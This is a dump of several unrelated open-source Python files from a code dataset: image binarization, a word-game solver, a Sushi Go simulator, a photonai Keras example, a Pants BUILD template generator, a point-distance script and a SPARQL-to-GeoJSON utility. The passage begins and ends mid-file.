blk_sz*(i+1), blk_sz*j: blk_sz*(j+1)]\n\t\t\tblk_mean[i, j] = np.mean(block)\n\t\t \n\timg = np.where(img < percentileBlack, 0, img)\n\timg = np.where(img >= percentileWhite, 255, img)\n\n\t#plt.imshow(img,cmap=\"gray\")\n\t#plt.show()\n\tfor i in range(1, img.shape[0]-1):\n\t\tfor j in range(1, img.shape[1]-1):\n\t\t\tif(img[i, j] == 0 or img[i, j] == 255):\n\t\t\t\tcontinue\n\t\t\tblock = img[i-1: i+1+1, j-1: j+1+1]\n\t\t\tblock = np.ma.array(block.flatten(), mask=False)\n\t\t\tblock.mask[len(block)//2] = True\n\t\t\t#print(block.mean())\n\t\t\t \n\t\t\tif(block.mean() >= blk_mean[i//blk_sz, j//blk_sz]):\n\t\t\t\timg[i, j] = 0\n\t\t\telse:\n\t\t\t\t# img[i, j] = 255\n\t\t\t\t# better\n\t\t\t\timg[i, j] = 255\n\t#plt.imshow(img,cmap=\"gray\")\n\t#plt.show()\n\treturn img\n\n\ndef smooth_bin_filter(img, blk_sz, fil_sz, thresh):\n img_smo = img.copy()\n for i in range(fil_sz, img.shape[0]-fil_sz):\n for j in range(fil_sz, img.shape[1]-fil_sz):\n block = img[i - fil_sz: i+fil_sz+1, j-fil_sz: j+fil_sz+1]\n #print(block.shape)\n black_no = np.sum(block)\n white_no = fil_sz**2 - black_no\n if(black_no >= thresh):\n img_smo[i, j] = 1\n if(white_no >= thresh):\n img_smo[i, j] = 0\n return img_smo\n\ndef smooth_bin(img, blk_sz):\n img_smo = img.copy()\n #for fil_sz, thresh in [(3, 18),(1, 5)]:\n img_smo = smooth_bin_filter(img, blk_sz, 2, 20) ##efetuando filtro 5x5\n img_smo = smooth_bin_filter(img, blk_sz, 1, 2) ##efetuando filtro 3x3\n #for fil_sz, thresh in [(3, 5),(1, 3)]:\n # img_smo = smooth_bin_filter(img, blk_sz, fil_sz, thresh)\n\n return img_smo\n","repo_name":"leotakii/fingerTest","sub_path":"lib_cleaner.py","file_name":"lib_cleaner.py","file_ext":"py","file_size_in_byte":2542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37626973772","text":"\r\nfrom __future__ import division, print_function, unicode_literals\r\n\r\nimport os\r\n\r\nimport data_io as io\r\nimport tiles\r\n\r\nimport board_manager\r\nimport trie_manager\r\n\r\n\r\n########################################################\r\n# Setup.\r\n# fname_game = '2012-05-08 20.36.00.png'\r\nfname_game = '2012-06-22 23.10.30.png'\r\n\r\nfname_dictionary = 'words_zynga.txt'\r\nfname_config = 'config.yml'\r\n\r\nfolder_data = 'data'\r\nfolder_games = 'games'\r\nfolder_dictionary = 'words and letters'\r\n\r\n##########################################\r\n# Do it.\r\npath_module = os.path.dirname(os.path.abspath(__file__))\r\n\r\npath_data = os.path.join(path_module, folder_data)\r\npath_games = os.path.join(path_data, folder_games)\r\npath_dictionary = os.path.join(path_data, folder_dictionary)\r\n\r\n#\r\n# Load data.\r\n#\r\n\r\n# Read config file.\r\nf = os.path.join(path_data, fname_config)\r\ninfo_config = io.read(f)\r\n\r\n# Load dictionary into trie.\r\nf = os.path.join(path_dictionary, fname_dictionary)\r\ndaggad = trie_manager.load_daggad_dictionary(f)\r\n\r\n# Reference tiles.\r\ninfo_reference_grid, info_reference_rack = tiles.load_reference_tiles()\r\n\r\n# Load game image.\r\nf = os.path.join(path_games, fname_game)\r\nimg_game, meta = io.read(f)\r\n\r\n# Parse game image to game letters.\r\nletters_game, letters_rack = tiles.parse_game_letters(img_game,\r\n info_reference_grid,\r\n info_reference_rack,\r\n info_config)\r\n# Build game board.\r\nboard = board_manager.Board()\r\nboard.set_game_letters(letters_game)\r\n\r\nprint(board)\r\n\r\nprint(letters_rack)\r\n\r\n#\r\n# Cross check.\r\n#\r\nfor i, j in board.anchors:\r\n\r\n ij_pre, letters_pre = board.contiguous_vertical( (i, j-1) )\r\n ij_post, letters_post = board.contiguous_vertical( (i, j+1) )\r\n\r\n board.playables[i, j] = ''\r\n\r\n # Loop over rack letters, establish wich are playable.\r\n for L in letters_rack:\r\n word_test = letters_pre + L + letters_post\r\n if daggad.search(word_test):\r\n board.playables[i, j] += L\r\n\r\n\r\n\r\n\r\n#\r\n# Work with a single line.\r\n#\r\nj = 15\r\nline, playable = board.get_line(j)\r\nprint(line)\r\nprint(playable)\r\n\r\n# Pretty print.\r\ntemplate = '%1s %1s %1s %1s %1s %1s %1s %1s %1s %1s %1s %1s %1s %1s %1s %1s %1s'\r\nprint()\r\n\r\nval = [v for v in playable]\r\nfor k in range(7):\r\n line = [v[:1] for v in val]\r\n print(template % tuple(line))\r\n val = [v[1:] for v in val]\r\n\r\n","repo_name":"Who8MyLunch/Eat_Words","sub_path":"eat_words/game_manager.py","file_name":"game_manager.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36837278481","text":"from sushigo.deck import StandardDeck\nfrom itertools import islice\nimport numpy as np\nimport pandas as pd\nimport datetime\nimport uuid\nimport pprint\n\npp = pprint.PrettyPrinter(indent=2)\n\n\nclass Game(object):\n def __init__(self, agents, deck=None, cards_per_player=10, n_rounds=3, verbose=False):\n if len(set([_.name for _ in agents])) != len(agents):\n raise ValueError(\"two players in game have the same name\")\n self.turn = 1\n self.round = 1\n self.verbose = verbose\n self.max_rounds = n_rounds\n self.cards_per_player = cards_per_player\n self.deck = deck if deck else StandardDeck()\n if self.cards_per_player * len(agents) * n_rounds > self.deck.cards_left:\n raise ValueError('Deck has not enough cards.')\n self.score = self.deck.scoring_function()\n self.players = {_.name: _ for _ in agents}\n self.game_id = str(uuid.uuid4())[:6]\n self.gamelog = pd.DataFrame({\n \"game_id\": self.game_id,\n \"round\": 0,\n \"turn\": 0,\n \"player\": list(self.players.keys()),\n \"action\": '',\n \"reward\": 0,\n \"round_reward\": 0\n })\n self.scores = {\"round-{}\".format(i): {_.name: 0.0 for _ in agents} for i in range(0, n_rounds + 1)}\n for name in self.players.keys():\n self.players[name].hand = list(islice(self.deck, self.cards_per_player))\n\n def log_user_action(self, player_name, action):\n \"\"\"\n This method appends to the log dataframe found in self.gamelog \n :param player_name: player object, not player-name \n :param action: action, card type string \n \"\"\"\n log = pd.DataFrame({\n 'game_id': [self.game_id],\n 'round': self.round,\n 'turn': self.turn,\n 'player': player_name,\n 'action': action,\n 'reward': self.calc_points(player_name),\n 'round_reward': self.calc_scores()[player_name]\n })\n df = pd.concat([self.gamelog, log], ignore_index=True).sort_values(['player', 'turn'])\n self.gamelog = df\n\n def play_turn(self):\n \"\"\"\n This method simulates a single turn in a game.\n \"\"\"\n chosen_cards = {}\n for player_name in self.players.keys():\n observation = self.get_observation(player_name)\n action_space = self.get_action_space(player_name)\n last_log_player = self.gamelog[self.gamelog['player'] == player_name].iloc[-1]\n reward = last_log_player['reward']\n player = self.players[player_name]\n\n # the player selects a type of card\n chosen_card = player.act(reward=reward,\n observation=observation,\n action_space=action_space)\n chosen_cards[player_name] = chosen_card\n\n # next we determine the new player_state\n player.table.append(chosen_card)\n player.hand = [card for card in player.hand if card is not chosen_card]\n for player_name, chosen_card in chosen_cards.items():\n self.log_user_action(player_name=player_name, action=chosen_card)\n\n # last thing we need to do is ensure that everybody switches hand\n current_hands = [p.hand for p in self.players.values()]\n for i, name in enumerate(self.players.keys()):\n self.players[name].hand = current_hands[i - 1]\n\n # if this is the last turn of the round we want to remove the table\n if self.turn % self.cards_per_player == 0:\n self.calc_scores()\n self.reset_table()\n # the very last thing is to update the turn\n self.turn += 1\n\n if self.verbose:\n info = {}\n info['game'] = self.game_id\n info['round'] = self.round\n info['turn'] = self.turn\n info['table'] = {_: [c.type for c in self.players[_].table] for _ in self.players.keys()}\n info['points'] = {_: self.calc_points(_) for _ in self.players.keys()}\n pprint.pprint(info, width=2)\n\n def reset_table(self):\n \"\"\"Clears the table. Persistent cards remain.\"\"\"\n for player in self.players.values():\n player.table = [card for card in player.table if card.persistent]\n\n def reset_game(self):\n self.turn = 0\n self.round = 1\n self.game_id = str(uuid.uuid4())[:6]\n self.deck.reset()\n for player in self.players.values():\n player.table = []\n self.scores = {\"round-{}\".format(i): {_: 0. for _ in self.players.keys()} for i in range(1, self.max_rounds + 1)}\n for name in self.players.keys():\n self.players[name].hand = list(islice(self.deck, self.cards_per_player))\n\n def play_round(self):\n for turn in range(self.cards_per_player):\n self.play_turn()\n # if all games haven't been played yet, draw cards again\n if self.round < self.max_rounds:\n self.scores[\"round-{}\".format(self.round)] = self.calc_scores()\n self.round += 1\n for name in self.players.keys():\n self.players[name].hand = list(islice(self.deck, self.cards_per_player))\n\n def simulate_game(self):\n \"\"\"\n This method simulates a single game and resets it.\n :return:\n \"\"\"\n for round in range(self.max_rounds):\n self.play_round()\n self.reset_game()\n return self.gamelog\n\n def end_results(self):\n output = {}\n this_game_log = self.gamelog[self.gamelog['game_id'] == self.game_id]\n this_game_log = this_game_log[this_game_log['turn'] == this_game_log['turn'].max()]\n for player in self.players:\n player_log = this_game_log[this_game_log['player'] == player]\n output[player] = player_log['reward'].iloc[-1]\n return output\n\n def get_action_space(self, player_name):\n return self.players[player_name].hand\n\n def get_observation(self, player_name):\n return {\n \"table\": {_: self.players[_].table for _ in self.players.keys()},\n \"hand\": [repr(_) for _ in self.players[player_name].hand],\n \"scores\": self.scores\n }\n\n @property\n def is_end_of_round(self):\n return self.turn % self.cards_per_player == 0\n\n @property\n def is_end_of_game(self):\n return self.round == self.max_rounds and self.is_end_of_round\n\n def calc_points(self, player_name):\n \"\"\"\n This method calculates the direct points of a player at the\n time of the method call.\n :return: float\n \"\"\"\n df = self.gamelog\n df = df[df[\"player\"] == player_name]\n df = df[df[\"round\"] == self.round - 1]\n prev_round_score = df[\"reward\"].max()\n return self.calc_scores()[player_name] + prev_round_score\n\n def did_player_win(self, player_name):\n \"\"\"\n :param player_name (str): name of the player in the game\n :return (bool): True or False\n \"\"\"\n df = self.gamelog\n df = df[df['turn'] == self.max_rounds * self.cards_per_player]\n return df['reward'].max() == df[df['player'] == player_name]['reward'].iloc[0]\n\n def calc_scores(self):\n \"\"\"\n This method calculates the score of all players.\n This method should only be called at the last turn end of a round.\n :return: dict with player-name: scores for current round.\n \"\"\"\n score_dict = self.score(\n player_cards={player_name: player.table for player_name, player in self.players.items()},\n end_round=self.is_end_of_round, end_game=self.is_end_of_game\n )\n for player_name, score in score_dict.items():\n self.scores[\"round-{}\".format(self.round)][player_name] = float(score)\n return score_dict\n\n def count_cards(self, player_name, cardtype):\n return len([_ for _ in self.players[player_name].table if _.type == cardtype])","repo_name":"koaning/sushigo","sub_path":"sushigo/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":8021,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"39474753533","text":"from sklearn.datasets import load_diabetes\nfrom sklearn.model_selection import KFold\n\nfrom photonai import Hyperpipe, PipelineElement, Categorical\n\nX, y = load_diabetes(return_X_y=True)\n\n\n# DESIGN YOUR PIPELINE\nmy_pipe = Hyperpipe('basic_keras_regression_pipe',\n optimizer='grid_search',\n optimizer_params={},\n metrics=['mean_squared_error'],\n best_config_metric='mean_squared_error',\n outer_cv=KFold(n_splits=2),\n inner_cv=KFold(n_splits=2),\n verbosity=1,\n project_folder='./tmp/')\n\n\n# ADD ELEMENTS TO YOUR PIPELINE\nmy_pipe.add(PipelineElement('StandardScaler'))\n\n# attention: shape of hidden_layer_sizes == shape of activations. If you want to choose a function in every layer,\n# grid_search eliminates combinations with len(hidden_layer_size) != len(activations).\n# Check out: hidden_layer_sizes=[25, 10], activations=['tanh', 'relu']\n\n# USE KERASDNNCLASSIFIER FOR CLASSIFICATION\nmy_pipe += PipelineElement('KerasDnnRegressor',\n hyperparameters={'hidden_layer_sizes': Categorical([[18, 14], [30, 5]]),\n 'dropout_rate': Categorical([0.01, 0.2])},\n activations='relu',\n epochs=50,\n nn_batch_size=64,\n verbosity=0)\n\n# NOW TRAIN YOUR PIPELINE\nmy_pipe.fit(X, y)\n","repo_name":"wwu-mmll/photonai","sub_path":"examples/neural_networks/keras_dnn_regression.py","file_name":"keras_dnn_regression.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"61"} +{"seq_id":"40233379398","text":"import re\nfrom collections import defaultdict\nfrom textwrap import dedent\n\nfrom generation_utils import GenerationUtils\n\nclass Target(object):\n \"\"\"Class to organize target template instances for generated BUILD files.\n\n To add a new target, created it as a class variable (see existing templates below), then add it to\n the list in get_template at the bottom so that it can be properly discovered.\n \"\"\"\n\n class NoSuchTargetError(Exception):\n def __init__(self, name):\n super(Target.NoSuchTargetError, self).__init__(\n 'Target \"{name}\" does not exist.'.format(name=name))\n\n class NoSuchValueType(Exception):\n pass\n\n class MissingTemplateArgumentError(Exception):\n pass\n\n class Template(object):\n\n def __init__(self, name, params, template, blank_lines=True):\n \"\"\"Creates a new target template, which can be used to generate code for targets in BUILD\n files using the format() method.\n\n :param name: The target type (eg, 'java_library')\n :param params: The list of parameters which can be injected into this template, optionally\n with an associated type declared by following with :type. Eg, 'sources:list' would create a\n parameter with the name 'sources' and the type 'list'. Understood types currently include\n 'raw', 'string', and 'list'. These types affect how the parameters are ultimately formatted\n when data is injected into this template. When the type is unspecified, it defaults to the\n values defined in DEFAULT_TYPES, or 'raw' if not present.\n\n Parameters also have a notion of extra flags, which basically act like type modifiers.\n These are specified in the following format: param_name:type:flags1:flag2:more_flags.\n\n Supported flags include:\n collapsible - when applied to a list, the list will be made a one-liner if it only has one\n argument.\n optional - if not specified (or specified as None), the argument will be entirely removed\n from the formatted output. This is done by splitting the output at the ',' character,\n and removing and entry which has optional parameters that are None, then joining it\n back together before returning the formatted result.\n sorted - when applied to a list, the list will be sorted() before formatting.\n emptyable - will format as the empty string rather than {} or [] for empty lists and\n dicts.\n :param template: The code for the actual template string, with parameter names specified in\n the same style used for str.format, eg 'Hello {person_name}.'. The parameters included in\n the template code must exactly match those defined in params, or an error will be raised\n when format() is invoked.\n :param blank_lines: Whether to pad the formatted output string with blank lines.\n \"\"\"\n self.name = name\n self.template = template\n self.blank_lines = blank_lines\n\n DEFAULT_TYPES = {\n 'name':'string',\n 'sources':'list',\n 'resources':'list',\n 'dependencies':'list',\n 'imports':'list',\n 'platform':'string',\n }\n\n self.flags = defaultdict(set)\n self.flags.update({\n 'sources': {'collapsible'},\n 'platform':'optional',\n })\n\n self.params = {}\n for param in params:\n if ':' in param:\n parts = param.split(':')\n name, kind = parts[:2]\n self.params[name] = kind\n flags = set(parts[2:])\n self.flags[name] = flags\n elif param in DEFAULT_TYPES:\n self.params[param] = DEFAULT_TYPES[param]\n else:\n self.params[param] = 'raw'\n\n def _indent_text(self, text, indent=2):\n lines = str(text).split('\\n')\n lines = ['{0}{1}'.format(' '*indent, line).rstrip() for line in lines]\n return '\\n'.join(lines)\n\n def _format_item(self, item):\n string_pattern = re.compile(r\"^(?P'?)(?P.*?)(?P=quote)(?P,?)$\")\n object_pattern = re.compile(r'^(?P[a-zA-Z_$0-9]+[(].*?[)].*?)(,?)$',\n re.DOTALL | re.MULTILINE)\n original = item\n item = item.strip()\n match = re.match(object_pattern, item)\n if match:\n # Handle things like jar() objects.\n return match.group('content')\n match = re.match(string_pattern, item)\n if not match:\n print(' Warning: Unrecognized item format, assuming raw object: {}.'.format(item))\n return original\n return \"'{}'\".format(match.group('content'))\n\n def _format_dict(self, param, data):\n if not data:\n return '{}'\n items = [\n (self._format_item(key), self._format_item(value)) for (key, value) in data.items()\n ]\n if 'sorted' in self.flags[param]:\n items = sorted(items)\n return '{{{}\\n }}'.format(''.join('\\n {}: {},'.format(key, val) for (key, val) in items))\n\n def _format_list(self, param, items):\n if not items:\n return '[]'\n items = [self._format_item(item) for item in items if item]\n if len(items) == 1 and 'collapsible' in self.flags[param]:\n return '[{}]'.format(items[0])\n if 'sorted' in self.flags[param]:\n items = sorted(items)\n\n return '[{}\\n ]'.format(','.join('\\n{}'.format(self._indent_text(item, indent=4))\n for item in items))\n\n def _extract(self, param, args):\n value = args.get(param) or ''\n kind = self.params[param]\n if kind == 'raw':\n return value\n # Value that can be matched properly by regexes.\n re_value = str(value).replace('\\n', ' ')\n if kind == 'string':\n if not value:\n return \"''\"\n if re.match(r'^\\s*([\"{quote}]).*?[^\\\\]\\1\\s*$'.format(quote=\"'\"), re_value):\n return value\n return \"'{0}'\".format(value)\n if 'emptyable' in self.flags[param] and not value:\n return ''\n if kind == 'list':\n if not value:\n return '[]'\n if isinstance(value, str):\n if '(' in value:\n return value # Hack for globs() and jar().\n value = [value,]\n return self._format_list(param, value)\n if kind == 'dict':\n if not value:\n return '{}'\n if hasattr(value, '__getitem__') and hasattr(value, 'items'):\n return self._format_dict(param, value)\n if isinstance(value, str):\n return value\n raise ValueError('Illegally formatted dict argument: {} = {}.'.format(param, value))\n\n raise Target.NoSuchValueType('No such value type \"{kind}\".'.format(kind=kind))\n\n def _is_optional(self, param):\n return 'optional' in self.flags[param]\n\n def _strip_optional(self, **kwargs):\n parts = self.template.split(',')\n for param in self.params:\n if self._is_optional(param):\n if param not in kwargs or kwargs[param] is None:\n parts = [part for part in parts if '{%s}'%param not in part]\n elif param not in kwargs:\n completed = kwargs\n completed.update({ p: 'MISSING VALUE!' for p in self.params if p not in kwargs })\n args_text = self.format(skip_missing_check=True, **completed)\n raise Target.MissingTemplateArgumentError('Missing argument \"{}\" for {}().\\n{}'\n .format(param, self.name, args_text))\n return ','.join(parts)\n\n def format(self, symbols=None, file_name=None, skip_missing_check=False, **kwargs):\n \"\"\"Behaves somewhat like str.format, creating a 'concrete' by injecting relevant parameters\n into this template.\n\n Parameters which were not specified when this template was initialized are ignored.\n Unspecified parameters will default to reasonable values based on their types (eg, [] or '').\n The parameters are formatted according to their type (specified as 'name:type', defaulting to\n their value in DEFAULT_TYPES or 'raw').\n\n This means parameters which are lists should be passed in as actual list objects, not as\n strings. If a string is passed in, it will be inserted literally, which is useful for\n specifying things like \"globs('*.java')\" rather than an explicit list of sources.\n\n Parameters which are strings will be automatically wrapped in single-quotes if they aren't\n already (eg, '\"hello\"' will become \"hello\" in the output file, and 'hello' will become\n 'hello'). Raw parameters will be inserted literally, so the string 'hello' will just become\n hello in the output.\n\n Example usage: Target.jar_library.format(name='lib', jars=[\"'3rdparty:fake-library'\",],)\n\n :param dict symbols: If present, replaces all instances of ${key} with symbols[key]\n in the formatted output string.\n :param string file_name: Optional string used to format error messages if something goes\n wrong.\n :param skip_missing_check: If true, will skip the normal check for missing arguments.\n :returns: a string containing the target, which can be inserted directly into a BUILD file.\n \"\"\"\n if symbols:\n\n def substitute(value):\n return GenerationUtils.symbol_substitution(symbols, value, symbols_name=file_name)\n\n for key, value in list(kwargs.items()):\n if not value:\n continue\n if any(isinstance(value, t) for t in (list,set,tuple,)):\n kwargs[key] = [substitute(v) for v in value]\n elif hasattr(value, '__getitem__') and hasattr(value, 'items'):\n kwargs[key] = { k: substitute(v) for k,v in value.items() }\n else:\n kwargs[key] = substitute(value)\n relevant = {}\n for param in self.params.keys():\n relevant[param] = self._extract(param, kwargs)\n template = self._strip_optional(**kwargs) if not skip_missing_check else self.template\n text = template.format(**relevant)\n if not self.blank_lines:\n return text\n return '\\n{0}\\n'.format(text)\n\n _ALL_TEMPLATES = {}\n @classmethod\n def create_template(cls, *args, **kwargs):\n template = cls.Template(*args, **kwargs)\n cls._ALL_TEMPLATES[template.name] = template\n return template\n\n @classmethod\n def get_template(cls, name):\n if name in cls._ALL_TEMPLATES:\n return cls._ALL_TEMPLATES[name]\n raise Target.NoSuchTargetError(name)\n\n @classmethod\n def reset(cls):\n \"\"\"Clear out existing templates.\n\n Intended for testing.\n \"\"\"\n cls._ALL_TEMPLATES = {}\n\n\nTarget.annotation_processor = Target.create_template('annotation_processor',\n ['name', 'sources', 'resources', 'dependencies', 'platform',],\n'''annotation_processor(name={name},\n sources = {sources},\n resources = {resources},\n dependencies = {dependencies},\n platform = {platform},\n)''')\n\nTarget.dependencies = Target.create_template('dependencies', ['name', 'dependencies',],\n'''target(name={name},\n dependencies = {dependencies},\n)''')\n\nTarget.fingerprint = Target.create_template('fingerprint', ['name', 'sources', 'dependencies'],\ndedent('''\n # This target's sole purpose is just to invalidate the cache if loose files (eg app-manifest.yaml)\n # for the jvm_binary change.\n fingerprint(name={name},\n sources = {sources},\n dependencies = {dependencies},\n )\n''').strip())\n\nTarget.placeholder = Target.create_template('placeholder', ['name',],\n'''target(name={name})\n''')\n\nTarget.jar_library = Target.create_template('jar_library', ['name', 'jars:list:sorted',],\n'''jar_library(name={name},\n jars = {jars},\n)''')\n\nTarget.java_library = Target.create_template('java_library', ['name', 'sources', 'resources',\n 'dependencies',\n 'groupId', 'artifactId',\n 'platform',],\n'''java_library(name={name},\n sources = {sources},\n resources = {resources},\n dependencies = {dependencies},\n platform = {platform},\n provides = artifact(org='{groupId}',\n name='{artifactId}',\n repo=square,), # see squarepants/plugin/repo/register.py\n)''')\n\nTarget.java_protobuf_library = Target.create_template('java_protobuf_library',\n ['name', 'sources', 'dependencies', 'imports', 'platform', 'groupId', 'artifactId'],\n'''java_protobuf_library(name={name},\n sources = {sources},\n imports = {imports},\n dependencies = {dependencies},\n platform = {platform},\n provides = artifact(org='{groupId}',\n name='{artifactId}',\n repo=square,), # see squarepants/plugin/repo/register.py\n)''')\n\nTarget.java_wire_library = Target.create_template('java_wire_library',\n ['name', 'sources', 'dependencies', 'roots:list', 'service_factory:string',\n 'enum_options:list:optional', 'registry_class:string', 'no_options:raw:optional',\n 'platform'],\n'''java_wire_library(name={name},\n sources = {sources},\n dependencies = {dependencies},\n roots = {roots},\n service_factory = {service_factory},\n enum_options = {enum_options},\n no_options = {no_options},\n registry_class = {registry_class},\n platform = {platform},\n)''')\n\nTarget.jvm_prep_command = Target.create_template('jvm_prep_command',\n ['name', 'mainclass:string', 'goal:string:optional', 'args:list:optional',\n 'jvm_options:list:optional', 'dependencies:list'], dedent('''\n jvm_prep_command(name={name},\n goal={goal},\n mainclass={mainclass},\n args={args},\n jvm_options={jvm_options},\n dependencies={dependencies},\n )\n '''))\n\nTarget.junit_tests = Target.create_template('junit_tests',\n ['name', 'sources', 'cwd:string', 'dependencies', 'platform', 'tags:list:optional',\n 'extra_env_vars:dict:optional', 'extra_jvm_options:list:optional'],\n'''junit_tests(name={name},\n # TODO: Ideally, sources between :test, :integration-tests and :lib should not intersect\n sources = {sources},\n cwd = {cwd},\n tags = {tags},\n dependencies = {dependencies},\n platform = {platform},\n extra_env_vars = {extra_env_vars},\n extra_jvm_options = {extra_jvm_options},\n)''')\n\n\nTarget.jvm_binary = Target.create_template('jvm_binary',\n ['name', 'main:string', 'basename:string', 'dependencies', 'manifest_entries:dict:emptyable',\n 'deploy_excludes:list:optional', 'platform', 'shading_rules:list:optional'],\n'''jvm_binary(name={name},\n main = {main},\n basename= {basename},\n dependencies = {dependencies},\n manifest_entries = square_manifest({manifest_entries}),\n deploy_excludes = {deploy_excludes},\n platform = {platform},\n shading_rules = {shading_rules},\n)''')\n\nTarget.resources = Target.create_template('resources',\n ['name', 'sources', 'dependencies:list:optional'],\n'''resources(name={name},\n sources = {sources},\n dependencies = {dependencies},\n)''')\n\nTarget.signed_jars = Target.create_template('signed_jars',\n ['name', 'dependencies', 'strip_version:raw:optional'],\n'''signed_jars(name={name},\n dependencies={dependencies},\n strip_version={strip_version},\n)''')\n\nTarget.unpacked_jars = Target.create_template('unpacked_jars',\n ['name', 'libraries:list', 'include_patterns:list', 'exclude_patterns:list'],\n'''unpacked_jars(name={name},\n libraries = {libraries},\n include_patterns = {include_patterns},\n exclude_patterns = {exclude_patterns},\n)''')\n\nTarget.jar = Target.create_template('jar',\n ['org:string', 'name:string', 'rev:string', 'force:raw:optional', 'excludes:list:optional',\n 'mutable:raw:optional', 'artifacts:list:optional', 'ext:string:optional',\n 'url:string:optional', 'classifier:string:optional', 'apidocs:string:optional',\n 'type_:string:optional', 'intransitive:raw:optional',],\n'''sjar(org={org}, name={name}, rev={rev}, force={force}, mutable={mutable}, ext={ext}, \\\nclassifier={classifier}, ext={type_}, intransitive={intransitive},\n url={url},\n apidocs={apidocs},\n artifacts={artifacts},\n excludes={excludes},)\n'''.strip(), blank_lines=False)\n\nTarget.sjar = Target.create_template('sjar',\n ['org:string', 'name:string', 'rev:string', 'force:raw:optional', 'excludes:list:optional',\n 'mutable:raw:optional', 'artifacts:list:optional', 'ext:string:optional',\n 'url:string:optional', 'classifier:string:optional', 'apidocs:string:optional',\n 'type_:string:optional', 'intransitive:raw:optional',],\n'''sjar(org={org}, name={name}, rev={rev}, mutable={mutable}, ext={ext}, \\\nclassifier={classifier}, ext={type_}, intransitive={intransitive},\n url={url},\n force={force},\n apidocs={apidocs},\n artifacts={artifacts},\n excludes={excludes},)\n'''.strip(), blank_lines=False)\n\nTarget.wire_proto_path = Target.create_template('wire_proto_path',\n ['name', 'sources', 'dependencies'], dedent('''\n wire_proto_path(name={name},\n sources={sources},\n dependencies={dependencies},\n )\n ''').strip())\n","repo_name":"ericzundel/mvn2pants","sub_path":"src/python/squarepants/target_template.py","file_name":"target_template.py","file_ext":"py","file_size_in_byte":16909,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"37345936018","text":"#Напишите программу, которая принимает на вход координаты двух точек \n#и находит расстояние между ними в 2D пространстве.\n#AB = √(xb - xa)2 + (yb - ya)2\ndef inputCoordinate(x):\n xy = [\"X\", \"Y\"]\n a = []\n for i in range(x):\n number = int(input(f\"Введите координату по {xy[i]}: \"))\n a.append(number)\n return a\nprint(\"Введите координаты точки А\")\ndotaA = inputCoordinate(2)\nprint(\"Введите координаты точки В\")\ndotaB = inputCoordinate(2)\nlength = ((dotaB[0] - dotaA[0]) ** 2 + (dotaB[1] - dotaA[1]) ** 2) ** (0.5)\nprint(f\"Длина отрезка: {length}\")","repo_name":"lvrach23/Home_work_lesson_1","sub_path":"Home_work_task_5.py","file_name":"Home_work_task_5.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23908909956","text":"import geojson\r\nimport json\r\nimport shapely.wkt\r\nfrom SPARQLWrapper import SPARQLWrapper, JSON\r\nfrom .config import STRABON_SPARQL_ENDPOINT\r\nimport pandas as pd\r\n\r\n\r\ndef query_sparql_endpoint(sparql_query: str):\r\n \"\"\"query sparql endpoint\"\"\"\r\n\r\n sparql = SPARQLWrapper(STRABON_SPARQL_ENDPOINT)\r\n sparql.setQuery(sparql_query)\r\n sparql.setReturnFormat(JSON)\r\n results = sparql.queryAndConvert()\r\n\r\n return results\r\n\r\n\r\ndef convert_query_output_to_geojson(results: dict):\r\n \"\"\"convert query results about cams observations to geojson\"\"\"\r\n\r\n try:\r\n # Execute the query and get the results\r\n features = []\r\n for r in results[\"results\"][\"bindings\"]:\r\n geom_wkt = r[\"foi_geom\"][\"value\"]\r\n obs_time = r[\"obs_time\"][\"value\"]\r\n obs_result = r[\"obs_result\"][\"value\"]\r\n\r\n geom = shapely.wkt.loads(geom_wkt)\r\n feature = geojson.Feature(geometry=geom, properties={\"observation_time\": obs_time, \"observation_result\": obs_result})\r\n features.append(feature)\r\n\r\n feature_collection = {\"type\": \"FeatureCollection\", \"features\": features}\r\n \r\n return feature_collection\r\n\r\n except Exception as e:\r\n print(f\"An error occurred: {e}\")\r\n return None\r\n\r\n\r\ndef json_to_dataframe(data):\r\n \"\"\"This function convert the results of a sparql query to a dataframe\"\"\"\r\n\r\n # Check if the \"bindings\" key exists in the JSON\r\n if \"results\" in data and \"bindings\" in data[\"results\"]:\r\n # Extract the \"bindings\" part from the JSON\r\n bindings = data[\"results\"][\"bindings\"]\r\n # Create an empty list to store the data in a structured format\r\n formatted_data = []\r\n\r\n for entry in bindings:\r\n # Create a dictionary to store the data for each entry\r\n entry_data = {}\r\n \r\n # Iterate through the entry's fields\r\n for field_name, field_data in entry.items():\r\n entry_data[field_name] = field_data.get(\"value\")\r\n\r\n formatted_data.append(entry_data)\r\n\r\n # Create a pandas DataFrame from the formatted data\r\n df = pd.DataFrame(formatted_data)\r\n #df.drop_duplicates(inplace=True)\r\n return df\r\n else:\r\n print(\"Invalid JSON format. Unable to convert to DataFrame.\")\r\n return None\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n query = \"\"\"\r\n PREFIX sosa: \r\n PREFIX geo: \r\n PREFIX geof: \r\n PREFIX gadm: \r\n PREFIX rdfs: \r\n\r\n SELECT ?obs_time ?obs_result ?foi_geom\r\n WHERE {\r\n {\r\n SELECT ?foi_ent ?gadm_name\r\n WHERE {\r\n ?foi_ent a sosa:FeatureOfInterest ;\r\n geo:intersects ?gadm_ent .\r\n ?gadm_ent a gadm:AdministrativeUnit ;\r\n gadm:hasName 'Geltendorf' ;\r\n } \r\n }\r\n\r\n ?obs_ent a sosa:Observation ;\r\n sosa:hasSimpleResult ?obs_result ; \r\n sosa:resultTime ?obs_time ;\r\n sosa:hasFeatureOfInterest ?foi_ent ;\r\n sosa:observedProperty ?obs_prop_ent .\r\n ?obs_prop_ent a sosa:ObservableProperty ;\r\n rdfs:label 'PM10' .\r\n ?foi_ent geo:hasGeometry ?foi_geom_ent .\r\n ?foi_geom_ent geo:asWKT ?foi_geom .\r\n\r\n\r\n FILTER (YEAR(?obs_time) = 2020 && MONTH(?obs_time) = 1)\r\n FILTER (?obs_result > 40)\r\n }\r\n \"\"\"\r\n\r\n # query strabon 